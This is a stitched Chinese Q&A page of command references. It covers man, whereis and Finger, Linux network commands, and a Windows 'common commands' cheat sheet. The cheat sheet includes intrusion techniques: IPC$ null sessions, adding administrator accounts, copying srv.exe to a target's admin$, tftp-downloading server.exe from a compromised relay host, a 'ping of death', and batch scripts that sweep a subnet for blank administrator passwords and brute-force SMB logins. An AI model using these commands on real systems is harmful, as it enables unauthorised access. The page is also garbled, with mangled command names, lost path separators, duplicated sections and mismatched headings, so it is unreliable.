-w 不顯示手冊頁，只顯示將被格式化和顯示的文件所在位置。

例如：查看cd命令的使用方法。

$ man cd

cd（n） Tcl Built-In Commands cd（n）

_________________________________________________________________

NAME

cd - Change working directory

SYNOPSIS

cd ?dirName?

_________________________________________________________________

DESCRIPTION

Change the current working directory to dirName, or to the

home directory （as specified in the HOME environment vari-

able） if dirName is not given. Returns an empty string.

KEYWORDS

working directory

Tcl 1

（END）

可以按q鍵退出man命令。

help命令

help命令用於查看所有Shell命令。用戶可以通過該命令尋求Shell命令的用法，只需在所查找的命令後輸入help命令，就可以看到所查命令的內容了。

例如：查看od命令的使用方法。

$ od --help

whereis命令

這個程序的主要功能是尋找一個命令所在的位置。例如，我們最常用的ls命令，它是在/bin這個目錄下的。如果希望知道某個命令存在哪一個目錄下，可以用whereis命令來查詢。

該命令的一般形式為：

whereis [選項] 命令名

說明：一般直接使用不加選項的whereis命令，但用戶也可根據特殊需要選用它的一些選項。

該命令中各選項的含義分別為：

b 只查找二進制文件

m 查找主要文件

s 查找來源

u 查找不常用的記錄文件

例如：查找ls命令在什麼目錄下。

$ whereis ls

ls:/bin/ls/usr/man/man1/ls.1

『叄』 什麼是Finger協議，Whois協議

查找器（Finger）屬於用戶信息協議，提供了一個與遠程用戶信息程序介面（RUIP）的界面。Finger 是一種基於傳輸控制協議（TCP），使用 TCP 埠 79 交換用戶信息的協議。在 Finger 埠本機對遠程機建立一個 TCP 連接。RUIP 因此准備好處理遠程終端的請求。本機發送給 RUIP 一個基於Finger 查詢說明的在線查詢，並等待 RUIP 的響應。RUIP 接收並處理這些查詢信息，返回答復後結束連接；本機到收回復後停止發送信號，繼而停止終端連接。

Finger 顯示了用戶信息，且這些信息是敏感信息。關於是否運行 Finger 以及響應中該出現哪些信息等方面，安全管理員應該作出明確的決定。一種現有 Finger 服務包含了用戶最後登錄的時間、他最後閱讀郵件的時間，是否有未讀郵件以及最近的郵件來自於誰等信息。這使得在進程中跟蹤會話及查看焦點位置成為可能。如果對什麽信息將洩漏沒有明確了解，有信息安全考慮的站點不應該運行Finger。

該服務系統應該對各種各樣形式的網路攻擊進行測試。特別地，RUIP 應該保護自己不發生異常輸入。提供配套的 Finger 和操作系統或網路軟體的提供商，應該依據他們的服務系統進行穿透測試。Finger 是一可穿透的渠道，就像 TELNET、FTP和SMTP，Finger 也是主機安全考慮范圍內的一種協議。因此，此系統的可靠性是極為重要的。在設計、實施和測試過程中，這一系統需要進行與 TELNET、FTP 和 SMTP 同樣多的安全檢查。

--------------------------------------------
Whois協議用來查詢INTERNET的解析，實現IP查詢。

『肆』 finger服務的基本信息

顯示有關運行 Finger 服務或 Daemon 的指定遠程計算機（通常是運行 UNIX 的計算機）上用戶的信息。該遠程計算機指定顯示用戶信息的格式和輸出。如果不使用參數，Finger 將顯示幫助。 -l
以長列表格式顯示用戶信息。
User
指定要獲得與其相關的信息的用戶。如果忽略 User 參數，finger 將顯示指定計算機上所有用戶的信息。
@ Host
指定運行 Finger 服務的遠程計算機，您將在其上查找用戶信息。可以指定計算機名或 IP 地址。
/?
在命令提示符下顯示幫助。 · 可以指定多個 User@Host 參數。
· 必須以連字元 (-) 而不是斜線 (/) 作為 finger 參數的前綴。
· 只有當「Internet 協議 (TCP/IP)」協議在「網路連接」中安裝為網路適配器屬性的組件時，該命令才可用。
· Windows Server 2003 家族不提供 finger 服務。 若要顯示計算機 users.microsoft.com 上 user1 的信息，請鍵入：
finger [email protected]
若要顯示計算機 users.microsoft.com 上所有用戶的信息，請鍵入：
finger @users.microsoft.comCDP：思科發現協議（CDP：Cisco Discovery Protocol）
思科發現協議 CDP 基本上是用來獲取相鄰設備的協議地址以及發現這些設備的平台。CDP 也可為路由器的使用提供相關介面信息。CDP 是一種獨立媒體協議，運行在所有思科本身製造的設備上，包括路由器、網橋、接入伺服器和交換機。

『伍』 什麼是finger 服務

Finger
顯示有關運行 Finger 服務或 Daemon 的指定遠程計算機（通常是運行 UNIX 的計算機）上用戶的信息。該遠程計算機指定顯示用戶信息的格式和輸出。如果不使用參數，Finger 將顯示幫助。

語法
finger [-l] [User] [@Host] [...]

參數
-l

以長列表格式顯示用戶信息。

User

指定要獲得與其相關的信息的用戶。如果忽略 User 參數，finger 將顯示指定計算機上所有用戶的信息。

@ Host

指定運行 Finger 服務的遠程計算機，您將在其上查找用戶信息。可以指定計算機名或 IP 地址。

/?

在命令提示符下顯示幫助。

注釋
• 可以指定多個 User@Host 參數。

• 必須以連字元 (-) 而不是斜線 (/) 作為 finger 參數的前綴。

• 只有當「Internet 協議 (TCP/IP)」協議在「網路連接」中安裝為網路適配器屬性的組件時，該命令才可用。

• Windows Server 2003 家族不提供 finger 服務。

示例
若要顯示計算機 users.microsoft.com 上 user1 的信息，請鍵入：

finger [email protected]

若要顯示計算機 users.microsoft.com 上所有用戶的信息，請鍵入：

finger @users.microsoft.comCDP：思科發現協議（CDP：Cisco Discovery Protocol）
思科發現協議 CDP 基本上是用來獲取相鄰設備的協議地址以及發現這些設備的平台。CDP 也可為路由器的使用提供相關介面信息。CDP 是一種獨立媒體協議，運行在所有思科本身製造的設備上，包括路由器、網橋、接入伺服器和交換機。

『陸』 關於Linux下必須知道的11個網路命令有哪些

以下羅列一些非常有用的網路命令（不止11個）
連通性

• ping <host>：發送 ICMP echo 消息（一個包）到主機。這可能會不停地發送直到你按下 Control-C，Ping 的通意味著一個包從你的機器通過 ICMP 發送出去，並在 IP 層回顯。Ping 告訴你另一個主機是否在運行。
• telnet <host> [port]：與主機在指定的埠通信。默認的 telnet 埠是 23。按 Control-] 以退出 telnet。其它一些常用的埠是：
7 —— echo 埠
25 —— SMTP，用於發送郵件
79 —— Finger (LCTT 譯註：維基網路 - Finger protocal，不過舉例 Finger 恐怕不合時宜，倒不如試試 80？），提供該網路下其它用戶的信息。

ARP

ARP 用於將 IP 地址轉換為乙太網地址。root 用戶可以添加和刪除 ARP 記錄。當 ARP
記錄被污染或者錯誤時，刪除它們會有用。root 顯式添加的 ARP 記錄是永久的 —— 代理設置的也是。ARP
表保存在內核中，動態地被操作。ARP 記錄會被緩存，通常在 20 分鍾後失效並被刪除。

• arp -a：列印 ARP 表。
• arp -s <ip_address> <mac_address> [pub]：添加一條記錄到表中。
• arp -a -d：刪除 ARP 表中的所有記錄。

路由

• netstat -r：列印路由表。路由表保存在內核中，用於 IP 層把包路由到非本地網路。
• route add：route： 用於向路由表添加靜態（手動指定而非動態）路由路徑。所有從該 PC 到那個 IP/子網的流量都會經由指定的網關 IP。它也可以用來設置一個默認路由。
例如，在 IP/子網處使用 0.0.0.0，就可以發送所有包到特定的網關。
• routed：控制動態路由的 BSD 守護程序。開機時啟動。它運行 RIP 路由協議。只有 root 用戶可用。沒有 root 許可權你不能運行它。
• gated：gated 是另一個使用 RIP 協議的路由守護進程。它同時支持 OSPF、EGP 和 RIP 協議。只有 root 用戶可用。
• traceroute：用於跟蹤 IP 包的路由。它每次發送包時都把跳數加 1，從而使得從源地址到目的地之間的所有網關都會返回消息。
• netstat -rnf inet：顯示 IPv4 的路由表。
• sysctl net.inet.ip.forwarding=1：啟用包轉發（把主機變為路由器）。
• route add|delete [-net|-host] <destination> <gateway>：（如 route add 192.168.20.0/24 192.168.30.4）添加一條路由。
• route flush：刪除所有路由。
• route add -net 0.0.0.0 192.168.10.2：添加一條默認路由。
• routed -Pripv2 -Pno_rdisc -d [-s|-q]：運行 routed 守護進程，使用 RIPv2 協議，不啟用 ICMP 自動發現，在前台運行，供給模式或安靜模式。
• route add 224.0.0.0/4 127.0.0.1：為本地地址定義多播路由。（LCTT 譯註：原文存疑）
• rtquery -n <host>（LCTT 譯註：增加了 host 參數）：查詢指定主機上的 RIP 守護進程（手動更新路由表）。

其它

• nslookup：向 DNS 伺服器查詢，將 IP 轉為名稱，或反之。例如，nslookup facebook.com 會給出 facebook.com 的 IP。
• ftp <host> [port]（LCTT 譯註：原文中 water 應是筆誤）：傳輸文件到指定主機。通常可以使用 登錄名 "anonymous" , 密碼 "guest" 來登錄。
• rlogin -l <host>（LCTT 譯註：添加了 host 參數）：使用類似 telnet 的虛擬終端登錄到主機。

重要文件

• /etc/hosts：域名到 IP 地址的映射。
• /etc/networks：網路名稱到 IP 地址的映射。
• /etc/protocols：協議名稱到協議編號的映射。
• /etc/services：TCP/UDP 服務名稱到埠號的映射。

工具和網路性能分析

• ifconfig <interface> <address> [up]：啟動介面。
• ifconfig <interface> [down|delete]：停止介面。
• ethereal & ;：在後台打開 ethereal 而非前台。
• tcpmp -i -vvv ：抓取和分析包的工具。
• netstat -w [seconds] -I [interface]：顯示網路設置和統計信息。
• udpmt -p [port] -s [bytes] target_host ：發送 UDP 流量。
• udptarget -p [port]：接收 UDP 流量。
• tcpmt -p [port] -s [bytes] target_host ：發送 TCP 流量。
• tcptarget -p [port]：接收 TCP 流量。

交換機

• ifconfig sl0 srcIP dstIP ifconfig sl0 srcIP dstIP：配置一個串列介面（在此前先執行 slattach -l /dev/ttyd0，此後執行 sysctl net.inet.ip.forwarding=1）
• telnet 192.168.0.254：從子網中的一台主機訪問交換機。
• sh ru 或 show running-configuration ：查看當前配置。
• configure terminal ：進入配置模式。
• exit ：退出當前模式。（LCTT 譯註：原文存疑）

VLAN

• vlan n ：創建一個 ID 為 n 的 VLAN。
• no vlan N ：刪除 ID 為 n 的 VLAN。
• untagged Y ：添加埠 Y 到 VLAN n。
• ifconfig vlan0 create ：創建 vlan0 介面。
• ifconfig vlan0 vlan_ID vlandev em0：把 em0 加入到 vlan0 介面（LCTT 譯註：原文存疑），並設置標記為 ID。
• ifconfig vlan0 [up]：啟用虛擬介面。
• tagged Y ：為當前 VLAN 的埠 Y 添加標記幀支持。

UDP/TCP

• A socklab udp ：使用 UDP 協議運行 socklab。
• sock ：創建一個 UDP 套接字，等效於輸入 sock udp 和 bind 。
• sendto <Socket ID> <hostname> <port #>：發送數據包。
• recvfrom <Socket ID> <byte #>：從套接字接收數據。
• socklab tcp ：使用 TCP 協議運行 socklab。
• passive passive：創建一個被動模式的套接字，等效於 socklab ，sock tcp ，bind ，listen 。
• accept ：接受進來的連接（可以在發起進來的連接之前或之後執行）。
• connect <hostname> <port #>：等效於 socklab ，sock tcp ，bind ，connect 。
• close ：關閉連接。
• read <byte #>：從套接字中讀取 n 位元組。
• write ：（例如write ciao、write #10）向套接字寫入 "ciao" 或 10 個位元組。

NAT/防火牆

• rm /etc/resolv.conf ：禁止地址解析，保證你的過濾和防火牆規則正確工作。
• ipnat -f file_name ：將過濾規則寫入文件。
• ipnat -l ：顯示活動的規則列表。
• ipnat -C -F ：重新初始化規則表。
• map em0 192.168.1.0/24 -> 195.221.227.57/32 em0：將 IP 地址映射到介面。
• map em0 192.168.1.0/24 -> 195.221.227.57/32 portmap tcp/udp 20000:50000：帶埠號的映射。
• ipf -f file_name ：將過濾規則寫入文件。
• ipf -F -a ：重置規則表。
• ipfstat -I ：當與 -s 選項合用時列出活動的狀態條目
內容來源：http；／／www．linuxprobe．com／linux－network－command．html

『柒』 怎麼退出win7安全命令

1. finger：查詢用戶信息，也能查看默認的用戶環境。
2. ftp：標準的文件傳輸協議的用戶介面，是在網路上傳輸文件最簡單有效的方法。
3. host：用於DNS查詢。
4. hostname：用於顯示或設置系統的主機名。
5. ifconfig：用於配置網卡介面。（可以使用down或up參數來禁用或啟用某個網卡介面）
6. mail：發送和接收郵件。
7. netstat：顯示網路連接、路由表和網路介面信息，用戶可以知道目前那些網路連接正在運行。
8. ping：此命令用於測試本計算機和網路上其它的計算機是否相連。
9. rlogin：遠程登陸命令，該命令與telnet命令很相似，允許用戶啟動遠程系統的交互會話。
10. rcp：rcp(remote file )命令是遠程文件復制命令，該命令用於在計算機之間復制文件，有兩中格式，一種格式用於文件動文件的復制，另一種用於把文件或目錄復制到其他文件目錄中
11. route：此命令用於顯示或設置IP路由表。
12. tcpmp：此命令用於測試網路的通信量。
13. talk：此命令可用於事項網路用戶的適時交談，但是必須將雙方系統的信息加入各自的/etc/hosts文件中，以相互識別。
14. telnet：此命令用於通過網路登陸遠程計算機，如同操作本地計算機一樣。
15. wall：wall(write all)命令可以用於發送消息給登陸本機的用戶。在發送消息時，可直接輸入要發送的消息，也可以把文件當成消息發送。
16. wget：此命令用於Linux環境下從Internet上下載文件，支持http和ftp協議，支持代理伺服器和斷點連續傳功能，能夠遞歸遠程主機上的目錄，查找合乎要求的的文件並下載到本地硬碟上。Wget命令可以在後台運行，截獲並忽略hantfup信號，因此用戶退出登陸後，仍可繼續運行。
17. &，bg：&，bg命令是後台執行命令，有時候用戶執行的程序可能要話很多時間，如果放在前台執行，可能無法繼續其他操作，最好將他放在後台執行。
18. fg：fg命令是前台執行命令，如果用戶有程序在後台運行，可以通過fg命令將程序從後台移到前台執行。

『捌』 給一些常用的運行命令吧

cmd （命令字元提示窗口）
net use ipipc$ " " /user:" " 建立IPC空鏈接
net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: ipc$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: ipc$ 登陸後映射對方C：到本地為H:
net use ipipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time 目標ip 查看對方時間
net time 目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
二：
del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
move 盤符路徑要移動的文件名 存放移動文件的路徑移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑文件名1 路徑文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
ipadmin$svv.exe c: 或:ipadmin$*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹 目標地址目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸後，將「IP」的server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:server.exe 登陸後，上傳本地c:server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）
call 路徑批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:、D:統一改為：EntSky )
三：
ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md 目錄名 創建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令＝字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑可執行文件的文件名 為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
regedit /s 注冊表文件名 導入注冊表；參數/S指安靜模式導入，無任何提示；
regedit /e 注冊表文件名 導出注冊表
cacls 文件名 參數 顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問許可權；/G 用戶名:perm 賦予指定用戶訪問許可權；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶許可權列表
REM 文本內容 在批處理文件中添加註解
netsh 查看或更改本地網路配置情況

四：

IIS服務命令：
iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現）
iisreset /start或stop 啟動（停止）所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。
FTP 命令： (後面有詳細說明內容)
ftp的命令行格式為:
ftp －v －d －i －n －g[主機名] －v 顯示遠程伺服器的所有響應信息。
－d 使用調試方式。
－n 限制ftp的自動登錄,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或 ？[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote－dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell，exit回到ftp環境,如!ls＊.zip

#5 五：

MYSQL 命令：
mysql -h主機地址 -u用戶名 －p密碼 連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格，其它也一樣）
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by "密碼"; 增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以後面都帶一個分號作為命令結束符）
show databases; 顯示資料庫列表。剛開始時才兩個資料庫：mysql和test。mysql庫很重要它裡面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。
use mysql；
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名；
create table 表名 (欄位設定列表)； 建表
drop database 庫名;
drop table 表名； 刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp --opt school>school.bbb 備份資料庫：（命令在DOS的mysql in目錄下執行）;注釋:將資料庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。
win2003系統下新增命令（實用部份）：
shutdown /參數 關閉或重啟本地或遠程主機。
參數說明：/S 關閉主機，/R 重啟主機， /T 數字 設定延時的時間，范圍0～180秒之間， /A取消開機，/M //IP 指定的遠程主機。
例：shutdown /r /t 0 立即重啟本地主機（無延時）
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明：/M 列出當前進程載入的dll文件，/SVC 顯示出每個進程對應的服務，無參數時就只列出當前的進程。
六：
Linux系統下基本命令： 要區分大小寫
uname 顯示版本信息（同win2K的 ver）
dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir）
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄，注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名 查看文件內容
cat >abc.txt 往abc.txt文件中寫上內容。
more 文件名 以一頁一頁的方式顯示一個文本文件。
cp 復制文件
mv 移動文件
rm 文件名 刪除文件，rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 刪除子目錄，目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機（同win2K），當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器（同win2K）

附：批處理命令與變數

1：for命令及變數 基本格式：
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數，如：%i ，而指定一個變數則用：%%i ，而調用變數時用：%i% ，變數是區分大小寫的（%i 不等於 %I）。
批處理每次能處理的變數從%0—%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2—%9指輸入的第2-9個值；例：net use ipipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個或一組文件，可使用通配符，如：(D:user.txt)和(1 1 254)(1 -1 254),{ 「(1 1 254)」第一個"1"指起始值，第二個"1"指增長量，第三個"254"指結束值，即：從1到254；「(1 -1 254)」說明：即從254到1 }

command：指定對第個文件執行的命令，如：net use命令；如要執行多個命令時，命令這間加：& 來隔開
command_parameters：為特定命令指定參數或命令行開關

IN (set)：指在(set)中取值；DO command ：指執行command

參數：/L 指用增量形式{ (set)為增量形式時 }；/F 指從文件中不斷取值，直到取完為止{ (set)為文件時，如(d:pass.txt)時 }。
用法舉例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明：對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接，如果成功就把該IP存在test.txt中。

/L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%%G 為變數(ip的最後一位）；& 用來隔開echo 和net use 這二個命令；| 指建立了ipc$後，在結果中用find查看是否有"命令成功完成"信息；%1.%%G 為完整的IP地址；(1 1 254) 指起始值，增長量，結止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
存為：ok.exe 說明：輸入一個IP後，用字典文件d:pass.dic來暴解d:user.dic中的用戶密碼，直到文件中值取完為止。%%i為用戶名；%1為輸入的IP地址（默認）。
七：
2：if命令及變數 基本格式：
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指定數字的退出編碼，指定條件為「真」。
例：IF errorlevel 0 命令 指程序執行後返回的值為0時，就值行後面的命令；IF not errorlevel 1 命令指程序執行最後返回的值不等於1，就執行後面的命令。
0 指發現並成功執行（真）；1 指沒有發現、沒執行（假）。
IF [not] 字元串1==字元串2 命令語句 如果指定的文本字元串匹配（即：字元串1 等於 字元串2），就執行後面的命令。
例：「if "%2%"=="4" goto start」指：如果輸入的第二個變數為4時，執行後面的命令（注意：調用變數時就%變數名%並加" "）
IF [not] exist 文件名 命令語句 如果指定的文件名存在，就執行後面的命令。
例：「if not nc.exe goto end」指：如果沒有發現nc.exe文件就跳到":end"標簽處。
